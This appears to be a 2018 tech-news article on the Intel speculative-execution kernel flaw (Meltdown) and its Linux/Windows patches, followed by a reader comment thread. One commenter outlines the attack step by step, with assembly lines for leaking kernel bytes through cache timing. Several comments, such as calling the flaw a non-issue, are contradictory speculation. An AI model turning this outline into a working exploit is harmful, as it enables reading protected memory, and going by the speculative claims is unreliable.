A fundamental design flaw in Intel’s processor chips has forced a significant redesign of the Linux and Windows kernels to defang the chip-level security bug.
Programmers are scrambling to overhaul the open-source Linux kernel’s virtual memory system. Meanwhile, Microsoft is expected to publicly introduce the necessary changes to its Windows operating system in an upcoming Patch Tuesday: these changes were seeded to beta testers running fast-ring Windows Insider builds in November and December.
Crucially, these updates to both Linux and Windows will incur a performance hit on Intel products. The effects are still being benchmarked, however we’re looking at a ballpark figure of five to 30 per cent slow down, depending on the task and the processor model. More recent Intel chips have features – such as PCID – to reduce the performance hit.
That’s one hell of a bug.
From the article, quoting a developer.
“There is presently an embargoed security bug impacting apparently all contemporary [Intel] CPU architectures that implement virtual memory…”
Maybe this is lost in translation but I understood the 286 to introduce Virtual Memory so this presumably affects every Intel CPU made since the 1970s? Yikes
AMD made an LKML post about this, explaining in more detail what sort of bug this is and that they’re not vulnerable.
If I understand it correctly (big if), the problem is in the way intel CPUs do speculative execution. Apparently, the speculative branches don’t fully respect memory protection, and someone has found a way to turn that into real-world effects. It seems to have been surprising that this was possible.
LKML link: https://lkml.org/lkml/2017/12/27/2
Edited 2018-01-03 01:29 UTC
Was just about to edit, yes; so just every Intel x86 from the Pentium Pro onwards, not so bad.
Edited 2018-01-03 01:41 UTC
Contemporary CPUs, though, and it’s implied that it’s related to speculative execution (in the old definition where it meant branch prediction and executing ahead of a stall).
That means 286, 386, and 486 cannot be affected, as they don’t have branch prediction – they just stall on branches where the available data isn’t present.
P5 Pentium and Bonnell Atom could be affected, but being in-order execution, are less likely to be affected even if the bug is present, they can’t get as far.
And, the major changes to the memory model, AFAIK, were 286 (added segmented MMU), 386 (32-bit MMU with flat addressing), P6 (36-bit segmentation added to MMU), Dothan (NX), Prescott (hackish 40-bit EM64T implementation), and Core 2 (full 48-bit, IIRC, EM64T implementation).
Here’s my guesses as far as where the bug would’ve likely been introduced:
* P6 (Pentium Pro) – if that’s the case, Pentium 4 and all Atoms/Atom-derived CPUs are likely unaffected, as they were separate clean-sheet redesigns (although elements were exchanged between designs)
* Dothan Pentium M – if that’s the case, Prescott Pentium 4s are possibly unaffected, Atoms/Atom-derived CPUs are likely unaffected, pre-Prescott Pentium 4s are almost certainly unaffected
* Prescott Pentium 4 – if that’s the case, then everything with NX support or everything with AMD64 support is likely affected (it wouldn’t be a big deal if only some old P4s were affected, after all, which would mean that some design reuse from P4 to later CPUs happened in the MMU)
* Core 2 – if that’s the case, then Atoms/Atom-derived CPUs are likely unaffected
* Something later – same deal about Atoms/Atom-derived CPUs likely being unaffected.
Phoronix already has some benchmarks for this on Linux: https://www.phoronix.com/scan.php?page=article&item=linux-415-x86pti…
Hi,
The minor timing quirk in Intel CPUs (that does not break documented behaviour, expected behaviour or any guarantee, and therefore can NOT be considered a bug in the CPU); allows an attacker to determine which areas of kernel space are used and which aren’t.
It does not allow an attacker to read or modify the contents of any memory used by the kernel, and doesn’t even tell the attacker what the areas of kernel space are being used for, and by itself is not a security problem at all. It only means that if there are massive security holes somewhere else, those massive security holes might or might not be a little bit easier to exploit. In other words; the main effect is that it makes “kernel address space randomisation” more ineffective at providing “security through obscurity” than it previously was.
Note that the insane hackery to avoid this non-issue adds significant overhead to kernel system calls; ironically, making the performance of monolithic kernels worse than the performance of micro-kernels (while still providing inferior security than micro-kernels). The insane hackery doesn’t entirely fix the “problem” either (a small part of kernel must remain mapped, and an attacker can still find out where in kernel space that small part of the kernel is and use this information to infer where the rest of the kernel is).
Fortunately the “malicious performance degradation attack” (the ineffective work-around for the non-issue) is easy for end users to disable.
– Brendan
In any case, would that be exploitable via JavaScript? If not I don’t care at all. Anything else I run already deliberately on my machine and it can access all my files anyway. And that is what matters to me, my files. Root cannot do more damage to me than a user process.
Hi,
If you have poorly designed hardware (e.g. that is susceptible to “rowhammer”) and a poorly designed kernel (e.g. a monolithic kernel where there’s a strong relationship between virtual addresses used by the kernel and physical addresses); then in theory this minor timing quirk can make it a little easier for an attacker to exploit huge gaping security holes that should never of existed.
Javascript probably can’t use the minor timing quirk (it relies on a strict access pattern involving the use of a “dodgy pointer” that will cause a page fault; and Javascript is designed not to support pointers or raw addresses); so an attacker using Javascript will exploit the gaping security holes without using the minor timing quirk.
– Brendan
Brendan,
The problem is there’s very little published info on this newest attack. The little bits that are around suggest to me this is much more significant than merely broken ASLR. It sounds like intel’s out of order branch prediction may be executing speculative code prior to checking the full credentials in such a way that they found a way to exploit the deferment, which does not happen on AMD processors. Apparently the temporary software fix is to reload the page table every kernel invocation. This invalidates the caches and happens to fix ASLR as well, but I think fixing ASLR was just a side effect – there’s not enough information to know for sure. I could be completely wrong but this media hush now would make very little sense if they had merely broken ASLR again given that ASLR is already publicly cracked and has been for ages already. I believe the sense of urgency and the deployment of high performance-cost workarounds in macos, windows, and linux, and planned service outages at amazon strongly suggest something much more critical was found to directly compromise kernel security on intel processors.
Hopefully Thom will post an update when all is finally revealed.
Edited 2018-01-03 05:27 UTC
Hi,
As I understand it:
a) Program tries to do a read from an address in kernel space
b) CPU speculatively executes the read and tags the read as “will generate page fault” (so that a page fault will occur at retirement), but also (without regard to permission checks and likely in parallel with permission checks) either speculatively reads the data into a temporary register (if the page is present) or pretends that data being read will be zero (if the page is not present) for performance reasons (so that other instructions can be speculatively executed after a read). Note that the data (if any) in the temporary register can not be accessed directly (it won’t become “architecturally visible” when the instruction retires).
c) Program does a read from an address that depends on the temporary register set by the first read, which is also speculatively executed, and because it’s speculatively executed it uses the “speculatively assumed” value in the temporary register. This causes a cache line to be fetched for performance reasons (to avoid a full cache miss penalty if the speculatively executed instruction is committed and not discarded).
d) Program “eats” the page fault (caused by step a) somehow so that it can continue (e.g. signal handler).
e) Program detects if the cache line corresponding to “temporary register was zero” was pre-fetched (at step c) by measuring the amount of time a read from this cache line takes (a cache hit or cache miss).
In this way (or at least, something vaguely like it); the program determines if a virtual address in kernel space corresponds to a “present” page or a “not present” page (without any clue what the page contains or why it’s present or if the page is read-only or read/write or executable or even if the page is free/unused space on the kernel heap).
– Brendan
There has to be more to it than that. I mean I’m not saying your analysis is wrong, but it has to be incomplete. Someone has either demonstrated a reliable attack using this exploit to compromise and/or crash affected systems from low privilege user space code, or there is more to it than there appears to be.
No way would everyone issue fixes like this in such a cloak and dagger fashion, especially a fix that causes a significant performance regression, if it wasn’t scaring the crap out of some people…
Hi,
You’re right – there’s something I’ve overlooked.
For a sequence like “movzx edi,byte [kernelAddress]” then “mov rax,[buffer+edi*8]”, if the page is present, the attacker could find out which cache line (in their buffer) got fetched and use that to determine 5 bits of the byte at “kernelAddress”.
With 3 more individual attempts (e.g. with “mov rax,[buffer+4+edi*8]”, “mov rax,[buffer+2+edi*8]” and “mov rax,[buffer+1+edi*8]”) the attacker could determine the other 3 bits and end up knowing the whole byte.
Note: It’s not that easy – with a single CPU the kernel’s page fault handler would pollute the caches a little (and could deliberately invalidate or completely pollute caches as a defence) before you can measure which cache line was fetched. To prevent that the attacker would probably want/need to use 2 CPUs that share caches (and some fairly tight synchronisation between the CPUs so the timing isn’t thrown off too much).
– Brendan
Edited 2018-01-03 07:40 UTC
Brendan,
Bear in mind this is just a very rough idea, but the theory is that if the branch predictor speculatively follows the branch, then page corresponding to the hidden kernel value should get loaded into cache. The call will inevitably trigger a fault, which is expected, but the state of the cache will not get reverted and will therefor leak information about the value in kernel memory. Scanning the dummy memory under clock analysis should reveals which pages are in cache. Different variations of this idea could provide more information.
Edited 2018-01-03 09:39 UTC
Would it be possible to slow down page fault notifications? For example, if the page fault was not on kernel space, halt the application for the time offset of a kernel read. In this way all segfaults would be reported at the same time.
Are there any sane apps that depends on timely segfault handling and thus would be affected by such a workaround?
Please do not claim bogus. Microkernels fixed against this defect will in fact take a higher hit than a monolithic kernel. Kernel to usermode switching cost increases when you have to change complete page tables every single time changing from kernel to userspace and back. Microkernel do this way more often than Monolithic. The advantage of running drivers in kernel space.
This is not exactly a non issue. The fact userspace ring is interfering was able to detect kernel space pages was found in 2016. Now kernel space pages with wrong protective bits for any reason are also exposed due to that fault.
Small fragment mapped of kernel mapped in userspace does not provide enough information to work out the randomisation. Complete kernel mapped into userspace as Intel CPU have been doing down right does.
Small fragment mapped into user-space on independent page tables does not mean there is any relationship of that information once you enter kernel mode and switch to kernel mode TLB.
Also this mapping fix to work around Intel MMU/CPU design issue applied to a Microkernel in fact hurts worst. It some ways it explains why AMD cpu have been slightly slower in particular benchmarks.
Yes AMD MMU/CPU if you attempt to access ring 0 pages from ring 1-3 and they have not been mapped for you its not happening. Same with ring 1 from ring 2 and 3.
So that KASLR attack from 2016 did not work on AMD CPUs. So finding extra protection flaws also have no effect on AMD CPU because the KASLR attack from 2016 does not work. Its not that the AMD has different timing is better page memory rules enforced by hardware so most of the kernel ring 0 pages are basically non existent to the userspace code.
Really this is another reason why in the past it was require by the USA Mil for anything they acquired to come 3 vendors using compatible sockets. So a vendor glitch like this could have been fixed by changing chips.
There is security by obscurity and there is no be there. No be there is better. AMD cpu/mmu is doing no be there so userspace could not see all of the kernel space ring 0 pages and this makes solving the address randomisation of kernel next to impossible.
Intel was depending on obscurity that no one would hunt the memory and find out that complete kernel space pages and userspace pages were in fact exposed to userspace program. Then Intel prayed that memory protection settings would always be enforced and correct. There turned up a few case in 2017 where the memory protections were not always on. So now you have kernel pages exposed to userspace and userspace able to write them how can you say mega failure.
Implementing two page tables one for kernel space and one for userspace is about the only valid way to work around intel goof up. Please note this kind of fault dates back to the 286. All the AMD processors with built in MMU have had different behaviour so preventing the problem.
Hi,
Intel wasn’t depending on obscurity – they didn’t invent or implement “kernel address space randomisation”. This probably came from one of the “hardened Linux” groups (SELinux? Grsecurity?) before being adopted in “mainline Linux” (and cloned by Microsoft).
As far as I know this problem *might* effect Pentium III and newer (and might only effect Broadwell and newer – details are hard to find). It does not effect 80286, 80386, 80486 or Pentium. 80286 doesn’t even support paging (and doesn’t do speculative execution either).
Don’t forget that recent ARM CPUs are also effected – it’s not just “Intel’s goof up” (this time).
– Brendan
So it finally proves Adrew S Tanenbaum was right all along, Minix a superior OS from the very beginning with a clever architecture
Btw, is that from finding Minix used as hypervisor last october, and subsequent pocs/hacks that the flaw was discovered in Intel cpus ?
Would a similar flaw be found in AMD chips if they also used Minix to perform similar tricks as well ? What about ARM chips and their ‘TrustedZone’ ?
No. Let me put is like this: Microkernels are already talking a similar hit as their context switches are from user to user, now Macrokernels get a similar hit by having to dump the virtual tables before going to user mode, just like each user’s table are dropped when moving to another user.
Carewolf,
Indeed, this workaround will make a macrokernel perform like a “naive” microkernel, which could be potentially worse than a microkernel that’s undergone design efforts to mitigate the userspace transition overhead (like vectored IO and memory mapped IPC, etc).
Intel will hopefully fix the flaw (whatever it is) for future CPUs, but realistically new CPUs could end up being cost prohibitive for many consumers who typically are multiple generations behind intel’s latest architectures, even after purchasing new computers since most of us cannot afford to pay several hundred dollars for intel’s latest CPU offerings. So unless intel gives some kind of credit to replace faulty CPUs previously sold & inventory, many consumers are going to be negatively impacted for the medium to long term.
Edit:
It’s too early to know what’s going on, but assuming one’s workloads aren’t terribly effected by this workaround, it could potentially be good news for people wanting to buy the faulty systems at a discounted price. For example this could instantly render tons of enterprise equipment completely worthless to their original owners. It may no longer be good enough for them, but it might be good for a home lab.
Edited 2018-01-03 15:09 UTC
There’s already an exploit in the wild using this to read kernel memory as a non-root user. All it takes is a bit of JavaScript downloading and executing such a binary and you’re pwned.
https://twitter.com/brainsmoke/status/948561799875502080
Damn. This should be great for AMD. I just hope it can be disabled in Microsoft’s case. No one needs to take 30% less performance on an offline machine.
raom,
However at least as of right now, the current mainline kernel (4.15-rc6) does not include it! Meaning that AMD users will be punished as well if they use that kernel.
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/d…
BTW if you want to browse the changes applied to the kernel source code in order to support this, here’s a handy link. All references to “PTI” functions and/or files are referring to this change.
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/d…
I didn’t see anyone mention it but there will be an ecological price to pay for that bug.
In my work we have about 100 big servers crunching data for a network operator, that is only for 1 customer. A 20% hit means we will have to buy extra servers to compensate as we cannot afford to loose data.
This will cost not just money and deployment work time but 20% extra power usage from now on…
Since I’m assuming you’re using fairly modern CPU’s that support the ‘PCID’ feature, which minimizes the performance impact of the fix (~5%) it shouldn’t be too drastic.
Obviously, if you’re at the edge of the performance cliff already, you’ll be affected, but if you’re riding the edge, you’re already screwed and should be in the process of buying more hardware.
Or perhaps you should make a pitch for ThreadRipper / Epyc based systems.
Edited 2018-01-03 08:06 UTC
Which CPUs have PCID? I googled, was it introduced with Westmere, or was it later?
https://www.fool.com/investing/2017/12/19/intels-ceo-just-sold-a-lot…
On Nov. 29, Brian Krzanich, the CEO of chip giant Intel (NASDAQ:INTC), reported several transactions in Intel stock in a Form 4 filing with the SEC.
So why kernel patches and not microcode? I’m assuming it’s just a short term solution and there will be a better long term solution.
kwan_e,
There’s only so much you can do in microcode to alter the behavior of some opcodes, but features like branch prediction are still hardwired and require new silicon designs. My understanding is that the engineers tried to avoid this, this was a last resort, but they found no other solution.
That is surprising to me. I’d have thought you’d want to make something like branch prediction modifiable (well, just like other instructions/features) so fixes can be applied.
So my question is, why is the lack of security check hardwired, or why it was designed in such a way that not even a microcode update could fix it?
Well, a cpu is not a fpga, the whole logic is not reprogrammable. The microcode allows to modify/patch the isa, but the main ‘engine’ (composed of the ‘alu’, the ‘execution unit’, …) have to be hardwired somehow.
Good explanation here : http://dsearls.org/courses/C391OrgSys/CPU/CPU.htm
I would hardly call speculative execution as part of the main engine, since processors can get along fine without it. I would have thought speculative execution would be one of the killer features of modern microcode-based designs.
AMD, at least claims, to not have this security hole hardwired into their processors, so it’s not impossible to not hardwire this stuff into the processor as to be unfixable.
Well, cpu architecture is private ip and the special recipe, the salt and pepper a company like intel, amd or arm (to name a few) promote as unique and groundbreaking and tremendous and butterflies to put to shame competition.
But not only, it’s also tricky engineer stuff to get the job done a little way better, faster, frugalier than the competition. These (speculative) execution units are engraved in stone (well, etched in silicon) and are not subject to change until next architecture iteration.
Just like motor engine, the basic principle remains the same, but that doesn’t prevent to have modifications and improvements. Yet if the problem is about the particle exhaustion of the combustion engines, which is common across all the whole industry is doomed.
Edited 2018-01-03 22:58 UTC
kwan_e,
Given that AMD’s x86 implementation is different from intel’s there’s no reason a hardware flaw in one must be present on the other. Unfortunately it looks like we’ll have to wait until next week at the earliest before we get more details…grr.
But even if the execution units were into microcode, what final unit would interpret at the very end of the chain ? There must be spinning gears somewhere getting the job done.
But… Transmeta Crusoe was (in factory) upgradable ?
Kochise,
I don’t know much about it.
I was only wondering about the speculative execution aspect, where something like (the lack of) security checks could have been implemented softly. Of course some pipelines need to be hardwired for performance reasons.
———–
Either way, it seems like a strange design decision overall to not honour security checks by default. No safe language can protect against that
kwan_e,
If it’s a check that has to happen on every single memory request, then the overhead of solving it with code rather than wires might not be justified.
I’m sure they’ve got thousands of tests cases scanning for recurrences of things like the FDIV bugs and whatnot, it would seem that nobody came up with a test case for this flaw at intel before now, so it slipped through the cracks. However without knowing what “it” is, we don’t know how egregious their failure was.
Article says :
I was going to mention also that MacOS is affected as well, it isn’t just a Windows and Linux issue, as the article here states.
Apparently some people on this site don’t like it when you ask an earnest question because you don’t know something.
Sorry, next time I’ll pretend to know everything.
You asked a question, I (we) replied, why are you getting angry ?
First of all, how do you know I am angry?
Second, it isn’t the replies to my question that I was referring to. Given that you couldn’t see even that, refer to the first point.
I’d say your sarcastic tone is revealing of your true self. Now pretend whatever you want to feel right.
Now I’m sarcastic.
How about this? I can write anything in any tone, and you’ll just read whatever emotion you want into it regardless of the truth.
Never does it once enter your mind that there are also cultural differences that may actually come across differently, and that you’re not an expert in all cultures.
Come on, don’t hide yourself behind a supposed cultural difference, I can actually detect earned up/down votes easier than you think, and there is an obvious bias of your groupies here.
Now pretend what you like, I made my own mind about it already.
Sounds like has some solution, and I assume it’s via Microcode.
https://newsroom.intel.com/news-releases/intel-issues-updates-protec…
whartung,
Taken at face value though, it seems many consumers won’t be covered because many desktop computers are sold with older cpus. My newest computer (i7-3770) that I bought two years ago is already outside their specified support window
Edited 2018-01-05 00:48 UTC
While I seat here reading this, I have apt updating the software on my laptop, which is promptly burning a hole in my lap as the CPU spins with the company mandatory virus scanner scans each and every updated file, while at the same time making my laptop less responsive.
Seems we’re all too happy to pay a significant price for security, so it’ll be business as usual within 3 months once the furore has died down.
Yeah, looks like everyone is making a bit fuss and bragging about a possible cpu slowdown while we already shove our over powerful computers with flash animations and real time virus scanners. Would have we noticed if not informed ?
We just bumped our DB box from 8 to 10 CPUs, like two weeks ago, as we were running higher and higher overall CPU loads.
This patch will effectively negate those CPUs and now we’ll probably have to allocate 2 more just to compensate and get us back to where we were.
However, because of our reliability and failover requirements, we also need to allocate more CPUs to the back up machines as well. Due to our need to ensure that our Staging and Production systems are equal for testing and rollout issues, we also have to upgrade our Staging infrastructure (which also has a hot spare machine).
So, this bug is going to “cost” us 8 more CPUs. We had to scavenge under used VMs to reclaim them in order to free up those CPUs for our upgrade. I honestly don’t know if we have 8 CPUs to spare.
Thankfully, we won’t need to do this to the rest of the infrastructure, as the CPU load isn’t as much of a problem but we’re certainly excited that everything (notably response times) are just going to be 10-20% slower across the board. Yay us.
So, yea, this is a big deal for us.
It comes down to use case I guess. There are folks on OSAlert (and the internet as a whole) who run 1000+ build farms at work, there are some who tinker as hobbyists and some who probably only use x86 when absolutely necessary.
It’s gonna impact different people in different ways (if at all). Some folks are thinking about their brand new gaming rig, others about their company’s 8-figure cloud operations.
That’s why I love this site, it’s a whole mix of backgrounds.
The impact of the security fix varies depending on what your workload is.
Gaming, which all runs in user space, rather than kernel space, seems largely unaffected.
Similarly, I would question whether a well tuned DB would be heavily affected, since it’s largely IO bound as a rule, rather than heavy kernel CPU.
Best plan is to start preparing for increased CPU counts, but wait to verify it’s a problem first.
… or buy AMD.
Well, there’s more to consider. In scientific circles it’s quite common to also include runtime results for algorithms, specifying the used cpu along with some relevant details – however, listing the kernel is not something generally done. It seems there’ll be the need to also do that from now on. Would be quite some “fun” (not) to keep around unpatched kernels just to do comparable tests to compare with published numbers of earlier works.
It is presumed that hobby and alternate operating systems will also be impacted.
There has been some discussion about the issue in Haiku’s forums. However, there was no mention of the issue at this time for MenuetOS, ReactOS, and SyllableOS (no longer active?).
There are probably many lesser known operating systems which may potentially be impacted. It will take some time to sort-out the legacy of this security flaw.
Well, obviously the onus is on the OS authors to take the proper steps for mitigation, but at the same time, they may well take in to account the simple odds of attack.
When I saw the potential performance impact on our dedicated DB server, I gave serious consideration to not wanting the patch. The argument is simply that if someone managed to get a process running on our DB machine (which is necessary to exploit this in the first place), we have far graver issues from much simpler paths of exposure than this thing.
The real threat of this thing, to me, is the public clouds, which, without mitigation, are patently unsafe now. But our current deployment model doesn’t leverage public infrastructure.
I will most likely be overruled by corporate in the end, however.
Just wondering if UEFI is potentially impacted by this flaw notably with respect to the insertion of a root-kit?
Indirectly, how about the Intel Management Engine which has been running Minix at the “Ring -3”?
BlueofRainbow,
Other bugs aside, this core isn’t normally accessible to users, Even if they could access it, I don’t think these simple low performance cores have speculative branching to begin with.
https://en.wikipedia.org/wiki/Intel_Quark
Intel system management SMM is a different matter though, it runs in a higher privilege level than an OS kernel. It’s normally used by the BIOS for mundane tasks. In theory it might contain code patterns that are vulnerable to timing attacks. In practice I’m not sure if the conditions required for an attack are being met. I guess we’d have to reverse engineer the BIOS code responsible for communicating with SMM to see if one could exploit that channel.
SMM has already been hacked in the past, although cache timing attacks could make for new kinds of exploits.
https://www.computerworld.com/article/2531246/malware-vulnerabilitie…